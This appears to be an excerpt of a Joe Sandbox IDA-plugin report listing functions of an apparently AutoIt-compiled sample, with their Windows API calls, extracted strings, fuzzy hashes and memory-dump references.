Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 8f6a53b7f598b384887f08f47e2f771c583ab926c5064bdbc52e07124a6b05ff
Instruction ID: 45540d29ec8f8bd647c8f84189c4db49c1e681d379f8207defc86a8e09298bab
Opcode Fuzzy Hash: 8f6a53b7f598b384887f08f47e2f771c583ab926c5064bdbc52e07124a6b05ff
Instruction Fuzzy Hash: C0F09631240558BBD3205B52DC0DEEF7B7DEFC6B11F000179F904D1050DBA91E0586B9

Function 004A7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 004A7243
EnterCriticalSection.KERNEL32(?,?,00450EE4,?,?), ref: 004A7254
TerminateThread.KERNEL32(00000000,000001F6,?,00450EE4,?,?), ref: 004A7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00450EE4,?,?), ref: 004A726E

Part of subcall function 004A6C35: CloseHandle.KERNEL32(00000000,?,004A727B,?,00450EE4,?,?), ref: 004A6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 004A7281
LeaveCriticalSection.KERNEL32(?,?,00450EE4,?,?), ref: 004A7288

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 6866153bda165fddff89c54b56a04aff2980fe99af90dc404db9e212ec316b1b
Instruction ID: 43ba2c09bb8b090de74924849dde8f6726166b4a38f2a11813be15f821f8cea0
Opcode Fuzzy Hash: 6866153bda165fddff89c54b56a04aff2980fe99af90dc404db9e212ec316b1b
Instruction Fuzzy Hash: 00F05E36540A12EBE7A11B64ED4CEDB773AEF55712B1405B2F603910A0CB7E5805CB58

Function 00498992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0049899D
UnloadUserProfile.USERENV(?,?), ref: 004989A9
CloseHandle.KERNEL32(?), ref: 004989B2
CloseHandle.KERNEL32(?), ref: 004989BA
GetProcessHeap.KERNEL32(00000000,?), ref: 004989C3
HeapFree.KERNEL32(00000000), ref: 004989CA

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: e4c56335bc88297b565992557d4dba1be3c596db6fc89810475ba47afce0a9f0
Instruction ID: ea49433e4deb43caaee20768470cea700d981fd96ca6abbefd857eee01484452
Opcode Fuzzy Hash: e4c56335bc88297b565992557d4dba1be3c596db6fc89810475ba47afce0a9f0
Instruction Fuzzy Hash: 89E0C236004401FBDA411FE2EC0CD0ABB6AFB89322B148232F21981070CB3AA828DB58

Function 00497530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004D2C7C,?), ref: 004976EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004D2C7C,?), ref: 00497702
CLSIDFromProgID.OLE32(?,?,00000000,004CFB80,000000FF,?,00000000,00000800,00000000,?,004D2C7C,?), ref: 00497727
_memcmp.LIBCMT ref: 00497748

Strings

,,M, xrefs: 0049753D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,M
API String ID: 314563124-4283052053
Opcode ID: 6835ffb3a80edee20391689292c8c53860c54b988753ff2666ca7d3fed0ae9b6
Instruction ID: 517e2f2bcd4c7a049270887219c131eda3132926dbe18c6100502810b00eb0c1
Opcode Fuzzy Hash: 6835ffb3a80edee20391689292c8c53860c54b988753ff2666ca7d3fed0ae9b6
Instruction Fuzzy Hash: 69812E71A10109EFCF04DF94C984DEEBBB9FF89315F1041A9E505AB250DB75AE06CB64

Function 004B85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004B8613
CharUpperBuffW.USER32(?,?), ref: 004B8722
VariantClear.OLEAUT32(?), ref: 004B889A

Part of subcall function 004A7562: VariantInit.OLEAUT32(00000000), ref: 004A75A2
Part of subcall function 004A7562: VariantCopy.OLEAUT32(00000000,?), ref: 004A75AB
Part of subcall function 004A7562: VariantClear.OLEAUT32(00000000), ref: 004A75B7

Strings

AUTOIT.ERROR, xrefs: 004B8728
Incorrect Parameter format, xrefs: 004B864B, 004B880D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 3b626502f215d24b44d50377b90e04eb0e99893cb9eb939ca0c39f68dd37fd92
Instruction ID: 6fba5e6ab79e518a025515df0d7e6f3f42bcab81f523aa3d71670c860f00e97a
Opcode Fuzzy Hash: 3b626502f215d24b44d50377b90e04eb0e99893cb9eb939ca0c39f68dd37fd92
Instruction Fuzzy Hash: 97915C706043019FCB10EF25C48499BBBE8EF89718F14496EF84A8B361DB35ED06CB66

Function 004A2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0045FC86: _wcscpy.LIBCMT ref: 0045FCA9

_memset.LIBCMT ref: 004A2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004A2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004A2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004A2C97

Strings

0, xrefs: 004A2B73

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 87efe582affadb8e74afd33359592e7ec5a4906032e9ff5f050bb54ceb75ae3c
Instruction ID: c87ad423c444830d9db3ca081fc249bf19d30e87c42b1df902305c0cd631e148
Opcode Fuzzy Hash: 87efe582affadb8e74afd33359592e7ec5a4906032e9ff5f050bb54ceb75ae3c
Instruction Fuzzy Hash: 9A51D3712083019BD7149E2CCA4566F77E4EF6A324F04092FF891D72D1EBB8DD04AB5A

Function 00453137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00453277
_memmove.LIBCMT ref: 00453310
_free.LIBCMT ref: 00453336
_memmove.LIBCMT ref: 004533E9

Strings

_E, xrefs: 00453322
3cE, xrefs: 00453225

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cE$_E
API String ID: 2620147621-1012516122
Opcode ID: e2285680cebeaa7b6aab16d1a58c73aeee955b7234b33d632d55ff2725011a11
Instruction ID: 428c04c392ed20260939507bee782906a322ac3d31c593c42569b1fc2bd9b35c
Opcode Fuzzy Hash: e2285680cebeaa7b6aab16d1a58c73aeee955b7234b33d632d55ff2725011a11
Instruction Fuzzy Hash: 16518D716043418FDB64CF29C480B6FBBE1BF85345F08492EE98987352E739E905CB46

Function 00456192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00456248
_memmove.LIBCMT ref: 004562E4
_memset.LIBCMT ref: 00456308

Strings

3cE, xrefs: 004562AF
ERCP, xrefs: 004561B3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cE$ERCP
API String ID: 2532777613-3425161335
Opcode ID: 48b2b303201e7ee6d0e2025faade25bba4441f7ecbdc86ae44c17201a8c2e315
Instruction ID: cf1328a61a13846f1c23f7f7dd8ef8bff1f1b7b94bc295097f3e6c2b5da66d70
Opcode Fuzzy Hash: 48b2b303201e7ee6d0e2025faade25bba4441f7ecbdc86ae44c17201a8c2e315
Instruction Fuzzy Hash: 4351BF70900309DFDB24DF55C9417ABBBE4AF44305F60856FE94AC7241E778AA48CB49

Function 004A2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004A27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004A27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 004A2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00505890,00000000), ref: 004A286B

Strings

0, xrefs: 004A27B5

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 55f0cdc9d60f0cc3c94fa3f12d2a662d2137965885cb3a669633218680197f48
Instruction ID: 78460ae1f01190669895c74f176ffb8f8de607262e2278768ec09897da60a65c
Opcode Fuzzy Hash: 55f0cdc9d60f0cc3c94fa3f12d2a662d2137965885cb3a669633218680197f48
Instruction Fuzzy Hash: 0D4191702043019FD720EF29C944B1BBBE4EF96314F044A2EF96597391D7B8A905DB5A

Function 004BD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 004BD7C5

Part of subcall function 0044784B: _memmove.LIBCMT ref: 00447899

Strings

cdecl, xrefs: 004BD81C
winapi, xrefs: 004BD836
stdcall, xrefs: 004BD847
none, xrefs: 004BD8A0

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 55f78523da2bc61dbe280687d824a165f3f2dfd90f56b5dbeaa7282a8b8296fa
Instruction ID: 4fae399f8d51eef20ebfed5a46bfa07031357b862d97a65ca79705f75a503b84
Opcode Fuzzy Hash: 55f78523da2bc61dbe280687d824a165f3f2dfd90f56b5dbeaa7282a8b8296fa
Instruction Fuzzy Hash: 63319A70904209ABDF00EF55CC819EEB3A5FF14324B108A6BE875972D1EB39A905CB98

Function 00498E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 0049AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0049AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00498F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00498F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00498F57

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

Strings

ComboBox, xrefs: 00498E9E
ListBox, xrefs: 00498ED3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 8ac35fe250c4b985894d7dc09689a7d11a72bb46da04b46c6ec49b064ef40185
Instruction ID: 6375d47b98d041c27b9ac8e8856f73df518bcf045dc0f3eacf4a5b38438be106
Opcode Fuzzy Hash: 8ac35fe250c4b985894d7dc09689a7d11a72bb46da04b46c6ec49b064ef40185
Instruction Fuzzy Hash: 7321F0B1A00108BFEF14ABA5CC85DFFBB69DF46364B10452FF421972E1DB3D480A9618

Function 004B182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004B184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004B18A2
InternetCloseHandle.WININET(00000000), ref: 004B18E9

Part of subcall function 004B2483: GetLastError.KERNEL32(?,?,004B1817,00000000,00000000,00000001), ref: 004B2498
Part of subcall function 004B2483: SetEvent.KERNEL32(?,?,004B1817,00000000,00000000,00000001), ref: 004B24AD

Strings

, xrefs: 004B1893

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 781406cd8388642d3a14ad7399e6a7dce2cd72b29c502efa83f4d78f9578803d
Instruction ID: 2030fd08e665cca7bda8038677828c103d461c5aa70fc0fd607a9438ee5ded32
Opcode Fuzzy Hash: 781406cd8388642d3a14ad7399e6a7dce2cd72b29c502efa83f4d78f9578803d
Instruction Fuzzy Hash: A421AFB1500208BFEB11AF618C95EFB77ADFB48748F10412FF405E6250EA688E05A7B9

Function 004C63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00441D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00441D73
Part of subcall function 00441D35: GetStockObject.GDI32(00000011), ref: 00441D87
Part of subcall function 00441D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00441D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004C6461
LoadLibraryW.KERNEL32(?), ref: 004C6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004C647D
DestroyWindow.USER32(?), ref: 004C6485

Strings

SysAnimate32, xrefs: 004C643C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 39608ccc4e4dc9ede6d9bc38c6737acccd72b9d40f202ad60b57ad5659f06e60
Instruction ID: d4dbc9550b37824b3b1f215d688db6939208f9d93629a49f1a41729df0c0a449
Opcode Fuzzy Hash: 39608ccc4e4dc9ede6d9bc38c6737acccd72b9d40f202ad60b57ad5659f06e60
Instruction Fuzzy Hash: 30218E75200205BBEF548F64DC40FBB37ADEF58368F11862EFA14922A1D7399C41A76C

Function 004A6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004A6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004A6DEF
GetStdHandle.KERNEL32(0000000C), ref: 004A6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004A6E3B

Strings

nul, xrefs: 004A6E36

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: dcf4806d7dc7e158ea13550be630d502dd17628147c2d268a4ddcc31dcdad978
Instruction ID: 9bb4dd0f9d5a49e2f1f13d89687bade5d4879bc4d123bd1dc7f946ed89572a64
Opcode Fuzzy Hash: dcf4806d7dc7e158ea13550be630d502dd17628147c2d268a4ddcc31dcdad978
Instruction Fuzzy Hash: A821C474600209ABDB209F39DC04A9B77F4EF66760F25462AFDA0D73D0DB759814CB58

Function 004A6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004A6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004A6EBB
GetStdHandle.KERNEL32(000000F6), ref: 004A6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004A6F06

Strings

nul, xrefs: 004A6F01

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 502fb4cec1eca46c730de7ad5707377861b83d3e6711c1788628de02a2f01d2e
Instruction ID: 5f354f629389ff263ba1a93725144693d6786fcb4023a8761825e28503844d3b
Opcode Fuzzy Hash: 502fb4cec1eca46c730de7ad5707377861b83d3e6711c1788628de02a2f01d2e
Instruction Fuzzy Hash: F021B279500305ABDB209F69CC04A9BB7A8EF66730F290A1AF9A0D73D0D77498518B59

Function 004AAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004AAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004AACA8
__swprintf.LIBCMT ref: 004AACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,004CF910), ref: 004AACFF

Strings

%lu, xrefs: 004AACBB

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 8a06a7da83d125fd85c9d9750691a4d17a51cd73076a65d26296ecbf25925d42
Instruction ID: 290d45b1a1d9aeba6bb7ce3dce42aee83ab7e20d7c04922ce9e39a9ba4adcfa1
Opcode Fuzzy Hash: 8a06a7da83d125fd85c9d9750691a4d17a51cd73076a65d26296ecbf25925d42
Instruction Fuzzy Hash: DF21A174A00109AFDB10DF65C945EAF7BB8EF49718B00407EF909AB252DB35EE05DB25

Function 004A1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0049FCED,?,004A0D40,?,00008000), ref: 004A115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0049FCED,?,004A0D40,?,00008000), ref: 004A1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0049FCED,?,004A0D40,?,00008000), ref: 004A118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0049FCED,?,004A0D40,?,00008000), ref: 004A11C1

Strings

@J, xrefs: 004A119D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @J
API String ID: 2875609808-2893840913
Opcode ID: d6458a080e8453e16ef4f05f2835771cf6f11613b860a2dfe6d628de46448b96
Instruction ID: 4502f9aed9bf9d2f3b2c37b92c673e4a32df82e6cf964845d728529e1d0df9ad
Opcode Fuzzy Hash: d6458a080e8453e16ef4f05f2835771cf6f11613b860a2dfe6d628de46448b96
